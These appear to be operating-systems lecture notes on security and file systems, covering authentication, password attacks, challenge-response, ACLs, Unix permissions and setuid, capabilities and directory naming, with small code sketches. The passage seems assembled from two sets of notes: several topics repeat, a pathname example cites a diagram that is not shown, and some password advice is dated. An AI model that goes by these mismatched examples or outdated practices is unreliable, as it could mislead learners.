6. Appropriate Levels of Security. The US Strategic Air Defense calls for a different level of security than my records of the grades for this course. You don't store your best silverware in a box on the front lawn, but you also don't keep it in a vault at the bank. Not only does excessive security mechanism add unnecessary cost and performance degradation, it can actually lead to a less secure system: if the protection mechanisms are too hard to use, users will go out of their way to avoid using them. A system that forced users to supply a password every time they wanted to open a file would inspire all sorts of ingenious ways to avoid the protection mechanism altogether.

Authentication

Authentication is a process by which one party convinces another of its identity. A familiar instance is the login process, through which a human user convinces the computer system that he has the right to use a particular account. If the login is successful, the system creates a process and associates with it the internal identifier that identifies the account. Authentication occurs in other contexts as well, and it isn't always a human being that is being authenticated: sometimes a process needs to authenticate itself to another process, and in a networking environment, a computer may need to authenticate itself to another computer. In general, let's call the party that wants to be authenticated the client and the other party the server.

One common technique for authentication is the use of a password. There is a value, called the password, that is known to both the server and to legitimate clients. The client tells the server who he claims to be and supplies the password as proof; the server compares the supplied password with what he knows to be the true password for that user. This is the technique used most often for login, but although it is a common technique, it is not a very good one.

Direct attacks on the password

The most obvious way of breaking in is a frontal assault on the password: simply try all possible passwords until one works. The main defense against this attack is the time it takes to try lots of possibilities.

If the client is a computer program (perhaps masquerading as a human being), it can try lots of combinations very quickly, but if the password is long enough, even the fastest computer cannot succeed in a reasonable amount of time. If the password is a string of 8 letters and digits, there are 2,821,109,907,456 possibilities.
A program that tried one combination every millisecond would take 89 years to get through them all. There are several defenses against this sort of attack:

• The password check is artificially slowed down, so that it takes longer to go through lots of possibilities. One variant of this idea is to hang up a dial-in connection after three unsuccessful login attempts, forcing the bad guy to take the time to redial.
• The system chooses the password. The problem with this is that the password will not be easy to remember, so the user will be tempted to write it down or store it in a file, making it easy to steal. (This is not a problem if the client is not a human being.)
• The system rejects passwords that are too "easy to guess". In effect, it runs a password cracker when the user tries to set his password and rejects the password if the cracker succeeds. This has many of the disadvantages of the previous point, and besides, it leads to a sort of arms race between crackers and checkers.

If users are allowed to pick their own passwords, they are likely to choose "cute doggie names", common words, names of family members, etc. That cuts down the search space considerably: a password cracker can go through dictionaries, lists of common names, and so on, and can also use biographical information about the user to narrow the search space. This is a far bigger problem for passwords than brute-force attacks.

A password can also be stolen rather than guessed, and that threat comes in many disguises:

• Eavesdropping (wire tapping). It is increasingly the case that authentication occurs over an insecure channel such as a dial-up line or a local-area network. If the bad guy can somehow intercept the information sent from the client to the server, password-based authentication breaks down altogether, since the password is sent in its original form ("plaintext" in the jargon of encryption). Note that the Unix scheme of storing f(password), described next, is of no help here: logging in requires knowing password, not f(password). We will consider this problem in more detail below.
• Looking over someone's shoulder while he's typing his password. Most systems turn off echoing, or echo each character as an asterisk, to mitigate this problem.
• Reading the password file. In order to verify that a supplied password is correct, the server has to have it stored somewhere. If the bad guy can somehow get access to this file, he can pose as anybody. While this isn't a threat on its own (after all, why should the bad guy have access to the password file in the first place?), it can magnify the effects of an existing security lapse. Unix introduced a clever fix to this problem that has since been almost universally copied: use some hash function f and, instead of storing password, store f(password). When a client sends his password, the server applies f to it and compares the result with the value stored in the password file. The hash function should have two properties: like any hash function, it should generate all possible result values with roughly equal probability; and in addition, it should be very hard to invert - that is, given f(password), it should be hard to recover password. It is quite easy to devise functions with these properties. Since only f(password) is stored in the password file, nobody can find out the password for a given user, even with full access to the password file. In fact, this technique is so secure that it has become customary to make the password file publicly readable!
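As a concrete illustration, here is a minimal C sketch of checking a password when only f(password) is stored, using the classic POSIX crypt() routine as the one-way function f. The convention of passing the stored string as the salt is the traditional Unix idiom; on Linux you may need to include <crypt.h> and link with -lcrypt. This is a sketch of the general idea, not any particular system's password code.

    #define _XOPEN_SOURCE 700
    #include <string.h>
    #include <unistd.h>   /* crypt(); some systems declare it in <crypt.h> */

    /* The password file stores only f(password). To check a login,
     * apply f to the claimed password and compare the results. */
    int password_ok(const char *claimed, const char *stored)
    {
        char *hashed = crypt(claimed, stored);  /* stored doubles as salt */
        return hashed != NULL && strcmp(hashed, stored) == 0;
    }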

Spoofing

This is the worst threat of all. We saw a form of this attack above, in the Trojan Horse example: how does the client know that the server is who it appears to be? If the bad guy can pose as the server, he can trick the client into divulging his password. It would seem that the server needs to authenticate itself to the client before the client can authenticate itself to the server. Clearly, there's a chicken-and-egg problem here. Fortunately, there's a very clever and general solution to it.

Challenge-response

There are a wide variety of authentication protocols, but they are all based on a simple idea. As before, we assume that there is a password known to both the (true) client and the (true) server. Here g is a hash function similar to the function f above, except that it has two arguments; it should have the property that it is essentially impossible to figure out password even if you know both x and g(password,x). Authentication is a four-step process:

• The client sends a message to the server saying who he claims to be and requesting authentication.
• The server sends a challenge to the client consisting of some random value x.
• The client computes g(password,x) and sends it back as the response.
• The server also computes g(password,x) and compares it with the response it got from the client.

Clearly this algorithm works if both the client and server are legitimate. An eavesdropper could learn the user's name, x, and g(password,x), but that wouldn't help him pose as the user: if he tried to authenticate himself to the server, he would get a different challenge x' and would have no way to respond. Even a bogus server is no threat, since the challenge provides him with no useful information. Similarly, a bogus client does no harm to a legitimate server except for tying him up in a useless exchange (a denial-of-service problem!).
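To make the four steps concrete, here is a toy sketch in C. The mixing function g below is a hypothetical stand-in, not a real cryptographic function; a production system would use something like an HMAC over the password and challenge.

    #include <stdint.h>

    /* Toy stand-in for g(password, x): in a real system this must be
     * hard to invert; this version is merely illustrative. */
    uint64_t g(uint64_t password, uint64_t x)
    {
        uint64_t v = password ^ (x * 0x9e3779b97f4a7c15ULL);
        v ^= v >> 33; v *= 0xff51afd7ed558ccdULL; v ^= v >> 33;
        return v;
    }

    /* Server side: after sending the random challenge x, accept the
     * client only if its response matches our own computation of g. */
    int server_accepts(uint64_t password, uint64_t x, uint64_t response)
    {
        return g(password, x) == response;
    }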

Protection Mechanisms

First, some terminology:

Objects: The things to which we wish to control access. They include physical (hardware) objects as well as software objects such as files, databases, semaphores, or processes. As in object-oriented programming, each object has a type and supports certain operations as defined by its type. In simple protection systems, the set of operations is quite limited: read, write, and perhaps execute, append, and a few others. Fancier protection systems support a wider variety of types and operations, perhaps allowing new types and operations to be dynamically defined.

Principals: Intuitively, "users" - the ones who do things to objects. Principals might be individual persons, groups or projects, or roles, such as "administrator." Often each process is associated with a particular principal, the owner of the process.

Rights: Permissions to invoke operations. Each right is the permission for a particular principal to perform a particular operation on a particular object. For example, principal solomon might have read rights for a particular file object.

Domains: Sets of rights, such as the right to modify a particular file. Domains may overlap. Domains are a form of indirection; there may be three levels of it (a principal owns a particular process, which is in a particular domain, which contains a set of rights), making it easier to make wholesale changes to the access environment of a process.

Conceptually, the protection state of a system is defined by an access matrix: the rows correspond to principals (or domains), the columns correspond to objects, and each cell is a set of rights. For example, if

    access[solomon]["/tmp/foo"] = { read, write }

then I have read and write access to file "/tmp/foo". I say "conceptually" because the matrix is never actually stored anywhere. It is very large and has a great deal of redundancy (for example, my rights to a vast number of objects are exactly the same: none!), so there are much more compact ways to represent it. The access information is represented in one of two ways: by columns, which are called access control lists (ACLs), and by rows, which are called capability lists.

Access Control Lists

An ACL (pronounced "ackle") is a list of rights associated with an object. A good example of the use of ACLs is the Andrew File System (AFS), originally created at Carnegie-Mellon University and now marketed by Transarc Corporation as an add-on to Unix. This file system is widely used in the Computer Sciences Department; your home directory is in AFS. AFS associates an ACL with each directory, and the ACL also defines the rights for all the files in the directory (in effect, they all share the same ACL). You can list the ACL of a directory with the fs listacl command:

    % fs listacl /u/c/s/cs537-1/public
    Access list for /u/c/s/cs537-1/public is
    Normal rights:
      system:administrators rlidwka
      system:anyuser rl
      solomon rlidwka

The entry system:anyuser rl means that the principal system:anyuser (which represents the role "anybody at all") has rights r (read files in the directory) and l (list the files in the directory and read their attributes). The entry solomon rlidwka means that I have all seven rights supported by AFS. In addition to r and l, they include the rights to insert new files in the directory (i.e., create files), delete files, write files, lock files, and administer the ACL itself. This last right is very powerful: it allows me to add, delete, or modify ACL entries, so I have the power to grant or deny any rights to this directory to anybody. The remaining entry shows that the principal system:administrators has the same rights I do (namely, all rights). This principal is the name of a group of other principals; the command pts membership system:administrators lists the members of the group.

Ordinary Unix also uses an ACL scheme to control access to files, but in a much stripped-down form. Each process is associated with a user identifier (uid) and a group identifier (gid), each of which is a 16-bit unsigned integer. The inode of each file also contains a uid and a gid, as well as a nine-bit protection mask, called the mode of the file. The mask is composed of three groups of three bits. The first group indicates the rights of the owner: one bit each for read access, write access, and execute access (the right to run the file as a program).

The second group similarly lists the rights of the file's group, and the remaining three bits indicate the rights of everybody else. For example, the mode 111 101 101 (0755 in octal) means that the owner can read, write, and execute the file, while members of the owning group and others can read and execute it. Programs that print the mode usually use the characters rwx rather than 0 and 1: each 1 is represented by r, w, or x, depending on its position, and each zero is represented by a dash. For example, the mode 111101101 is printed as rwxr-xr-x.

The mode ---r--rw- (000 100 110 in binary) means that the owner cannot access the file at all, while members of the group can only read the file, and others can both read and write it. Note that this scheme can actually give a random user more powers over the file than its owner. (On the other hand, the owner of the file, and only the owner, can execute the chmod system call, which changes the mode bits to any desired value.)

In somewhat more detail, the access-checking algorithm is as follows: the first three bits are checked to determine whether an operation is allowed if the uid of the file matches the uid of the process trying to access it. Otherwise, if the gid of the file matches the gid of the process, the second three bits are checked. If neither of the ids match, the last three bits are used. The code might look something like this:

    boolean accessOK(Process p, Inode i, int operation) {
        int mode;
        if (p.uid == i.uid)
            mode = i.mode >> 6;
        else if (p.gid == i.gid)
            mode = i.mode >> 3;
        else
            mode = i.mode;
        switch (operation) {
            case READ: mode &= 4; break;
            case WRITE: mode &= 2; break;
            case EXECUTE: mode &= 1; break;
        }
        return (mode != 0);
    }

(The expression i.mode >> 3 denotes the value i.mode shifted right by three bit positions, and the operation mode &= 4 clears all but the third bit from the right of mode.)

When a new file is created, it gets the uid and gid of the process that created it, and a mode supplied as an argument to the creat system call.

Most modern versions of Unix actually implement a slightly more flexible scheme for groups: a process has a set of gids, and the check to see whether the file is in the process's group checks whether any of the process's gids match the file's gid. The code might look something like this:

    boolean accessOK(Process p, Inode i, int operation) {
        int mode;
        if (p.uid == i.uid)
            mode = i.mode >> 6;
        else if (p.gidSet.contains(i.gid))
            mode = i.mode >> 3;
        else
            mode = i.mode;
        switch (operation) {
            case READ: mode &= 4; break;
            case WRITE: mode &= 2; break;
            case EXECUTE: mode &= 1; break;
        }
        return (mode != 0);
    }

In these systems, when a new file is created, it gets the uid of the process that created it and the gid of the containing directory. There are system calls to change the uid or gid of a file. For obvious security reasons, these operations are highly restricted: some versions of Unix only allow the owner of the file to change its gid, only allow him to change it to one of his own gids, and don't allow him to change the uid at all.

For directories, "execute" permission is interpreted as the right to get the attributes of files in the directory, and write permission is required to create or delete files in the directory. This leads to the surprising result that you might not have permission to modify a file, yet be able to delete it and replace it with another file of the same name but with different contents!

Unix has another very clever feature - so clever that it is patented! The file mode actually has a few more bits that I have not mentioned. One of them is the so-called setuid bit. If a process executes a program stored in a file with the setuid bit set, the uid of the process is set equal to the uid of the file. At first glance, it would seem that letting my process pretend to be owned by another user would be a big security hole, but it isn't, because processes don't have free will: they can only do what the program tells them to do. This rather curious rule turns out to be a very powerful feature, allowing the simple rwx permissions directly supported by Unix to be used to define arbitrarily complicated protection policies.

As an example, suppose you wanted to implement a mail system that works by putting all mail messages into one big file, say /usr/spool/mbox. I should be able to read only those messages that mention me in the To: or Cc: fields of the header. Here's how to use the setuid feature to implement this policy. Define a new uid mail, make it the owner of /usr/spool/mbox, and set the mode of the file to rw------- (i.e., the owner mail can read and write the file, but nobody else has any access to it). Write a program for reading mail, say /usr/bin/readmail. This file is also owned by mail and has mode srwxr-xr-x; the 's' means that the setuid bit is set. My process can execute this program (because the "execute by anybody" bit is on), and when it does, it suddenly changes its uid to mail, so that it has complete access to /usr/spool/mbox. While my process is running readmail, it is following instructions written by the designer of the mail system, so it is safe to let it have access appropriate to the mail system.

A process really has two uids, called the effective uid and the real uid. When a process executes a setuid program, its effective uid changes to the uid of the program file, but its real uid remains unchanged. It is the effective uid that is used to determine what rights the process has to what files, but there is a system call to find out the real uid of the current process. That is the one more feature that helps readmail do its job: readmail can use this system call to find out what user called it, and then show only the appropriate messages.

Capabilities

An alternative to ACLs are capabilities. A capability is a "protected pointer" to an object: it designates an object and also contains a set of permitted operations on the object. For example, one capability may permit reading from a particular file, while another allows both reading and writing. To perform an operation on an object, a process makes a system call, presenting a capability that points to the object and permits the desired operation.

For capabilities to work as a protection mechanism, the system has to ensure that processes cannot mess with their contents. There are three distinct ways to ensure the integrity of a capability:

Tagged architecture. Some computers associate a tag bit with each word of memory, marking the word as a capability word or a data word. The hardware checks that capability words are only assigned from other capability words. To create or modify a capability, a process has to make a kernel call.

Separate capability segments. If the hardware does not support tagging individual words, the OS can protect capabilities by putting them in a separate segment and using the protection features that control access to segments.

Encryption. Each capability can be extended with a cryptographic checksum that is computed from the rest of the content of the capability and a secret key. Only the kernel knows the key. Each time a process presents a capability to the kernel to invoke an operation, the kernel checks the checksum to make sure the capability hasn't been tampered with. If a process modifies a capability, it cannot modify the checksum to match without access to the key.

Capabilities, like segments, are a "good idea" that somehow seldom seems to be implemented in real systems in full generality. Like segments, capabilities show up in an abbreviated form in many systems. For example, the file descriptor for an open file in Unix is a kind of capability. When a process tries to open a file for writing, the system checks the file's ACL to see whether the access is permitted. If it is, the process gets a file descriptor for the open file, which is a sort of capability to the file that permits write operations. Unix uses the separate segment approach to protect the capability: the capability itself is stored in a table in the kernel, and the process has only an indirect reference to it (the index of the slot in the table). File descriptors are not full-fledged capabilities, however; for example, they cannot be stored in files, because they go away when the process terminates.
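Here is a minimal C sketch of the encryption approach just described. The structure layout and the seal() function are hypothetical; a real kernel would use a proper keyed cryptographic checksum rather than this toy mixer.

    #include <stdint.h>

    struct capability {
        uint32_t object;   /* which object the capability names */
        uint32_t rights;   /* permitted operations, as a bit mask */
        uint64_t check;    /* checksum over (object, rights) and the key */
    };

    /* Toy keyed checksum; only the kernel knows key. */
    static uint64_t seal(uint32_t object, uint32_t rights, uint64_t key)
    {
        uint64_t v = (((uint64_t)object << 32) | rights) ^ key;
        v ^= v >> 30; v *= 0xbf58476d1ce4e5b9ULL; v ^= v >> 31;
        return v;
    }

    /* On every operation the kernel recomputes the checksum; a process
     * that alters object or rights cannot fix up check without the key. */
    int capability_valid(const struct capability *c, uint64_t key)
    {
        return c->check == seal(c->object, c->rights, key);
    }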

Directories

Directories are collections of files, and an important piece of the file system's meta-data. Their primary function is to impose a naming system on files and organize them relative to each other: directories provide a mechanism for collecting the names of files together so that a user can find the file(s) they're interested in.

Flat Directories

The simplest kind of directory is a simple flat list of filenames and the information needed to find the respective file contents. These are rarely used today, although they still do exist: the Palm Pilot has a flat file name space, and IBM MVS, which will never completely die, has a flat file name space.

Flat file systems are not often used because they provide no inherent organization to the files and are difficult to make efficient for large collections of files. Name space collisions have to be avoided in a flat space, so generally some naming convention is followed to prevent them. A common one is to prepend filenames with the user's name. For example, a collection of my files might have names like:

    DISK1.FABER.HOME.PROFILE
    DISK1.FABER.PROJECT1.GRADES

Problems with this include enforcing the conventions (what if other users choose $ to separate parts of the file name?) and the inefficiency of holding all the system's files in one big list. Either the whole table will have to be searched, or it will have to be kept sorted; keeping a large list sorted adds overhead, and scanning a large table linearly is not efficient. (Consider scanning the system directory to print all the files that I own.) Also, updating such a centralized structure requires synchronization: all file creations and deletions will have to enforce exclusion on the table, or we have to introduce a very fine-grained locking mechanism. Basically, a single directory doesn't scale easily to many users.

Hierarchical Directories

A natural organization of files is into a hierarchy: files can be seen as being in related classes, and each class has a directory. For example:

    All Files
        User files
        Instructor files
            Faber's files

This is implemented as a tree of directories where each entry in the directory describes either a file or another directory. If the hierarchy is chosen carefully, the result is many small directories, and scanning each one is a reasonable amount of work. Synchronization is maintained for each directory, and because separate tasks can be confined to separate directories, contention can be made rare.

In general, hierarchies are a natural way to organize many systems of data; the desktop metaphor of files in folders and cabinets underscores this (although the hierarchy afforded by hierarchical file systems is richer, because there can be nearly arbitrary levels of nesting).

Given that we want to impose such a structure on our file names, we have to describe a syntax to find a file in the tree. This is done by giving a path through the directory tree. A character is chosen as the path separator, and a path is then the list of directories traversed in order to reach the file. The strings that represent such paths are called pathnames. Using / as a separator, a pathname for the file labelled file in the above diagram is /etc/ast/fn.

These paths can be absolute or relative. Paths that begin with the path separator are absolute pathnames; paths that do not are relative, and have the current directory prepended. It's inconvenient to name files with their entire pathname all the time; after all, we put related files in the same directory so they'd be close together, and specifying the long pathname hides that. One solution is to add the concept of a current directory to the system and allow paths to be specified relative to it. An example relative pathname is test/halt, which means the file halt in the directory test, which is a subdirectory of the current directory.

To facilitate relative naming, many filesystems have special names that refer to the current directory and the parent directory. These are often . and .., respectively. The . directory provides the answer to a UNIX® puzzle: how do you delete a file named -f? rm -f fails, as the filename is taken as a switch. The solution is to use a longer relative path: rm ./-f.

Links

Directories impose a naming structure on files, and in file systems that support them, links offer the opportunity to give a file multiple names. If the information about a file (its attributes and OS data) is not stored directly in a directory entry, a file may be pointed to by entries in several directories. Such multiple naming is called linking. For example, the file in the directory tree above can be named as /etc/ast/fn or /etc/jim/f2.

There are 2 major forms of links: hard and soft. A hard link is a direct link from the directory entry to the internal file data. All hard links are equivalent, and a file cannot be deleted without deleting all its hard links. In general, hard links are restricted to parts of the file system that share internal information, and to preserve the tree structure of hierarchical file systems, they generally can't link to directories.

Soft links are a path translation (often also called a symbolic link): they are a pathname that points to the file (or directory) on which to operate. Because they are a translation, soft links can access any parts of the file system they can address, and they are often allowed to point to directories, because programs that rely on the hierarchical nature of the file system (like system utilities) can detect and ignore them. But because they are a visible pathname translation, not linked closely with the internal structure of the file system, they may not be updated when a file is deleted or moved. It's possible for a symbolic link to point to a file that no longer exists. This is called a dangling pointer problem, by analogy with the same problem involving freed memory in a program.

Directory Operations

Like files,
directories have well-defined operations:

Create: Allocate space for a new directory and create the special directories (. and ..) in it.

Delete: Remove a directory. Most OSes require the directory to be empty.

Open: Analogous to file open.

Read: Get the information about one or more files. (The sketch after this list shows the Unix flavor of this operation.)

Write: Change the information about one or more files.

Link: Add a link to an existing file.

Unlink: Remove a link to an existing file (if this is the last link and the file is closed, this usually implies removal of the file).

Rename: Change the directory's name. Really covered by write, as is file renaming.

Metadata manipulation: Change the permissions or some other field associated with this directory.
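As a sketch of the read operation against a real API, here is how a Unix program lists a directory with the POSIX opendir/readdir calls. Error handling is abbreviated.

    #include <dirent.h>
    #include <stdio.h>

    /* The "read" operation on a directory: print each entry's name. */
    int list_directory(const char *path)
    {
        DIR *d = opendir(path);
        struct dirent *e;
        if (d == NULL)
            return -1;
        while ((e = readdir(d)) != NULL)
            printf("%s\n", e->d_name);   /* includes "." and ".." */
        closedir(d);
        return 0;
    }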

Other Directory Systems

Although hierarchical systems are by far the most common, there are some other interesting ways to think about file naming:

• Attribute-based naming. Not all data can be organized nicely into a hierarchy. For example, is the right hierarchy /usr/faber/pubs/papers/RST or /usr/faber/papers/published/RST? Attribute-based naming says that filenames should be the set of attributes that a file satisfies. For example, the filename above might be (user=faber, type=published-paper, topic=RST packets).
• Temporal filesystems. The folks at Lucent have added a time axis to their Plan 9 filesystem. Rather than overwriting files for each update, they save all the versions (well, actually they save the state once a day), and in addition to giving a pathname, you can also give a temporal coordinate. You can change directory into the source code from last week. It's a strange but powerful idea.
• User-specific name spaces. The folks from Lucent also allow dynamic binding of their file systems. A user specifies a set of directories to bind to a name, and thereafter the user has their own version of that directory. The idea of an execution path is turned into a customized /bin directory.

Naming Systems

The mapping from pathname to file is just one example of a naming system. A naming system maps a string to a resource (or maybe just to another string). Being able to name a resource is the first step in being able to manipulate it. Some other interesting naming systems are:

• The Domain Name System: hierarchical distributed naming of computers on the Internet. The names are parsed backward: edu is resolved before usc before aludra in aludra.usc.edu. (The path separator is a ".".) Each "directory", or domain, is resolved by a different machine in the Internet.
• X.500: an alternative attribute-based naming system for hosts and users. The names look like PN=faber, INST=ISI, DEPT=CS, IN=USC, CO=US.
• Printer names: strings bind to printers in a flat namespace.

• URLs: a combination of DNS and hierarchical filenames. The name compactly describes the communication protocol to use, the name of the machine to contact, and the file to ask about (or other service-dependent identifier).

The decision of what elements in a system to name, and how to name them, is significant. Most successful systems have a significant naming component.

Security and the File System

File System Security

The problem addressed by the security system is how information and resources are protected from people. Security concerns arise throughout the OS, but the file system is a particularly good place to discuss security, because its protection mechanisms are visible and the things it protects are very concrete (for a computer system). Issues include the contents of data files, which are a privacy issue, and the use of resources, which is an accounting issue.

We're talking about some interesting stuff when we talk about security. For certain people who like puzzles, finding loopholes in security systems and understanding them to the point of breaking them is a challenge, and I understand the lure of this. If you really want to play around with UNIX® security, get yourself a linux box and play to your heart's content. Remember, however, that everyone using these machines is a student like yourself who deserves the same respect that you do. Breaking into another person's files is like breaking into their home, and should not be taken lightly, either by those breaking in or by those who catch them. Uninvited intrusions should be dealt with harshly (for example, it's a felony to break into a machine that stores medical records). So: don't break into someone's account here and start deleting files.

The fact that data security does not stop with computer security cannot be understated. If your computer is perfectly secure and an employee photocopies printouts of your new chip design, don't blame the computer security system. Security must pervade the system, both in terms of technical operation and user behavior, or the system is insecure.

Policies and Mechanisms

Policies are real-world statements about the protection that the system provides. These are all statements of (significantly different) policies:

• Users should not be able to read each other's mail.
• No student should be able to see answer keys before they are made public.
• All users should have access to all data.

The various systems in a computer that control access to resources are the mechanisms used to implement a policy. A good security system is one with clearly stated policy objectives that have been effectively translated into mechanisms.

Design Principles

Although every security system is different, some overriding principles make sense. Here is a list generated by Saltzer and Schroeder from their experience on MULTICS; it remains valid today. (These principles are fun to apply to caper movies: next time you watch Mission Impossible or Sneakers or War Games, try to spot the security flaws that let the intruders work their magic.)

Public Design

Surprisingly, public designs tend to be more secure than private ones. The reason is that the security community as a whole reviews them and reports flaws that can be fixed.

Even if you take pains to keep the source code of your system secret, you should assume that attackers have access to your code. The bad guys will share knowledge; the good guys should, too.

Default access is no access. People who need a certain access will let you know about it quickly.

Test for current authority. Just because the user had the right to perform an operation a millisecond ago doesn't mean they can do it now. Test the authority every time, so that revocation of that authority is meaningful. This holds for subsystems just like login screens.

Give each entity the least privilege required for it to do its job. The more privilege an entity possesses, the more costly a mistake or misuse of that entity is: printer daemons that run as root can cause logins that run as root. This may mean creating a bunch of fine-grained privilege levels. It sounds like a platitude, but it is a principle worth following at all levels.

Keep the design simple and uniform. The more features a system has, the more likely opportunities there are for exploitation. For a security design to be integrable into the rest of the system, it must be simple and capable of being applied uniformly.

The system must be acceptable to the users. An unacceptable security system is automatically attacked from within: if a security feature is too onerous to the users, they will just invent ways to circumvent it, and these circumventions are then available to the attackers. All security systems are a compromise between security and usability.

Build in security from the start. Adding security later almost never works: there are too many holes to plug, and as a practical matter, security is nearly impossible to add to a fundamentally insecure system.

A Sampling of Protection Mechanisms

The idea of protection domains originated with Multics and is a key one for understanding computer security. Imagine a matrix of all protection domains on one axis and all system resources (files) on another. The contents of each cell in the matrix are the operations permitted by a process (or thread) in that domain on that resource:

    Domain    File1    File 2    Domain 1    Domain 2
    1         RW       RWX       -           Enter
    2         R        -         -           -

Notice that once domains are defined, the ability to change domains becomes another part of the domain system: processes in given domains are allowed to enter other domains. A process's initial domain is a function of the user who starts the process and the process itself.

While the pure domain model makes protection easy to understand, it is almost never implemented; holding the domains as a matrix doesn't scale.
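As a tiny illustration, the matrix above can be coded directly. This C sketch uses made-up bit encodings for the rights; it also shows why the representation doesn't scale, since a real system would have thousands of domains and millions of objects, with almost all cells empty.

    #include <stdint.h>

    enum { R = 1, W = 2, X = 4, ENTER = 8 };   /* rights as bit flags */

    /* Rows are domains; columns are File1, File2, Domain1, Domain2. */
    static const uint8_t matrix[2][4] = {
        { R | W, R | W | X, 0, ENTER },   /* Domain 1 */
        { R,     0,         0, 0     },   /* Domain 2 */
    };

    int allowed(int domain, int object, uint8_t right)
    {
        return (matrix[domain][object] & right) != 0;
    }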

Some Domains and Rings

UNIX divides processes into 2 parts: a user part and a kernel part. When running as a user, the process has limited abilities; to access hardware, it has to trap into the kernel. The kernel can access all OS state and hardware, and it checks similar credentials before using its increased powers on a process's behalf. This is a simplification of the MULTICS system of protection rings: rather than 2 levels, MULTICS had a 64-ring system where each ring was more privileged than the ones surrounding it.

The UNIX file protection system is similar, but simplified. There are 9 (really 12) bits associated with each file that determine the read, write, and execute permissions of the owner, members of the owning group, and everyone else. 2 of the other 3 bits allow limited domain switching: they are the setuid bits that allow processes running the program to change user or group id to be that of the owner of the file. When the owner of a file is root, this can convey considerable new power on the process.

Access Control Lists

Another representation of the domain concept is Access Control Lists (ACLs). These are lists attached to each resource (file) that describe the valid operations on it; conceptually, each file contains a list of the users that can operate on the file. Generally the ACL languages are rich enough to describe users and groups of users economically. This economy comes from wildcarding and exclusion operators: wildcarding provides a way to describe all users meeting a given criterion, and exclusion operators allow exclusion of a set of users.

ACLs are useful and support revocation of rights. That is, when a user is reading a file and the owner wants to stop that, the owner can remove that right; because the system checks current authority (see above), the read will be stopped.

Capabilities

Another way to encode domain rights is to encode a process's rights in its pointer to the object: file rights would be in the file descriptor, memory rights in a memory pointer, and so on. Such pointers with protection information encoded in them are called capabilities. Capabilities have operations defined on them, like copying, and making copies with reduced or amplified rights. Capabilities are kept in special lists (called C-lists) that must be protected from direct manipulation by processes, and there are a few ways to do that. One way is in hardware: the memory actually contains bits, which the CPU cannot touch in user mode, that determine whether a memory location holds a capability. Another is to make the C-list part of the PCB and only manipulable by the OS. A third is to have the OS encrypt the capabilities with a key unknown to the user.

When a process presents a capability to the OS, the OS need not verify anything about the user, only whether the capability is valid. That property makes it hard to revoke a capability, although there are a couple of ways: embedded validity checks and indirect access.

Authentication and Security

Central to the idea of protection systems is the idea of an authentication system. An authentication system proves the identities of elements with which a computer system interacts; this can include users and other systems. The OS decides what it will do on a user's behalf based on credentials stored in the PCB.

Generally, authentication is accomplished by means of the exchange of a shared secret, and the most common shared secret is a password.

Passwords

A password is a string of characters that the user and computer system agree will establish the user's identity to the system. The analogy is to physical passwords, where people who wanted access to a military facility had to recite an unusual phrase to establish their identity to those inside the fort. In distributed systems, authentication should be 2-way: the user should authenticate to the machine, and the machine to the user.

Computer passwords are often the weakest part of a computer security system: passwords can be stolen (physically or electronically) or guessed. A seminal work in computer security ran a cracking program on a couple hundred donated password files, testing common English words and the top 100 (or so) female names, and had an ungodly (better than 50%) hit rate. Hopefully education has gotten better.

There are several good rules for choosing a computer password:

• Choose a long one. Most systems allow eight or ten letters - use 'em all. There are only 140,608 3-letter (cap and lower case) passwords (52^3 = 140,608), but more than 50 trillion 8-letter combinations. Guessing 1 in 50 trillion is literally hundreds of millions of times harder than guessing 1 in 140,608.
• Don't use a common phrase or name. Note that "common phrase" means anything available in the system dictionary. In my opinion you're better off not using any English words, and non-English words fare little better. No science fiction or fantasy words, either.
• Include some non-letters: *&$ˆ@ and the like.
• Change your password relatively frequently - every six months or so is a good idea. Don't get too attached to it. And don't write it down; you've only changed a difficult puzzle into a physical search.

Password Storage

It's possible to store passwords in the open, but systems like UNIX® don't store the password at all; they store the result of a 1-way function applied to the password. A 1-way function (these are also called hash functions) is an interesting function that is relatively easy to compute but difficult to invert: essentially the only way to invert it is to compute all the forward transforms, looking for one that matches the reverse. To check a user's password, the system takes the password as input, computes the 1-way function on it, and compares the result with the value in the password file; if they match, the password was (with high probability) correct. Note that even knowing the algorithm and the encrypted password, it's still impossible to easily invert the function, so the system can check passwords without immediately giving away their contents.

Although it's theoretically reasonable to leave a hashed password file in the open, it is rarely done anymore. There are a couple of reasons:

• In practice, bad passwords are not uncommon enough, so rather than having to try all the passwords (or half the passwords on average), trying a large dictionary of common passwords is often enough to break into an account on the system.

• A password file can be attacked off-line, with the system under attack completely unaware that it is under attack. By forcing the attacker to actually try passwords on the system that they're invading, the system can detect an attack.

(1-way functions of this kind are also called hash functions.)

Physical ID

Another shared secret can be physical attributes of the human who wants to access the system. Several body measurements identify a user with significant precision: finger lengths, retina patterns, fingerprints, etc. Controlling access based on physical features has problems if the features are damaged (cutting one's fingertip should confuse a fingerprint scanner). It also raises the grisly possibility of theft of those features: one way to beat a thumbprint scanner is to physically acquire someone's thumb.

Other Shared Secrets

Some other forms of shared secrets include:

• Shared Real Secrets - the user gives the system some information that "only the user knows" and the system quizzes the user on it instead of a password. Good, in that the user rarely has to write such information down. Bad, in that there isn't much information that can't be found by a determined investigator.

• One-time passwords - the computer generates a table of passwords for the user, each of which is to be used once. When the user tries to log in, the computer asks him/her for the next password in the sequence. The advantage is that if an attacker manages to steal a password, it cannot be reused. The disadvantage is that an attacker can steal the list (and a user is unlikely to memorize a set of single-use passwords).

• Code books - a frequent system is to ask the user for a word from a code book. This was in vogue for a while with anti-piracy systems: to gain access to a program, the program would ask the user for the n-th word on the m-th page of the manual. In theory only a legitimate owner has the manual; in practice it means that the pirate photocopied the manual.

• Challenge/Response - the system and user agree on some (one-way) function or transformation. At login time, the computer presents the user with a value (called the challenge) and the user responds with the transform of the value. For example, if the function were the square root, a challenge of 9 would be correctly answered with a response of 3. In practice the functions are more complex and usually encoded in hardware (a software sketch appears below). The hardware is often password protected so that theft of the hardware only means that the user cannot log in, not that the intruder can.
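Here is a toy Java sketch of the challenge/response idea (an illustration of my own, not from the notes). It assumes the shared secret is a key for an HMAC, which plays the role of the agreed-upon one-way transform; the class and method names are hypothetical.

    import java.security.MessageDigest;
    import java.security.SecureRandom;
    import javax.crypto.Mac;
    import javax.crypto.spec.SecretKeySpec;

    class ChallengeResponse {
        private final SecretKeySpec key;   // the shared secret

        ChallengeResponse(byte[] secret) {
            key = new SecretKeySpec(secret, "HmacSHA256");
        }

        // System side: issue a fresh, unpredictable challenge.
        static byte[] challenge() {
            byte[] c = new byte[16];
            new SecureRandom().nextBytes(c);
            return c;
        }

        // Both sides: the agreed-upon transform of the challenge.
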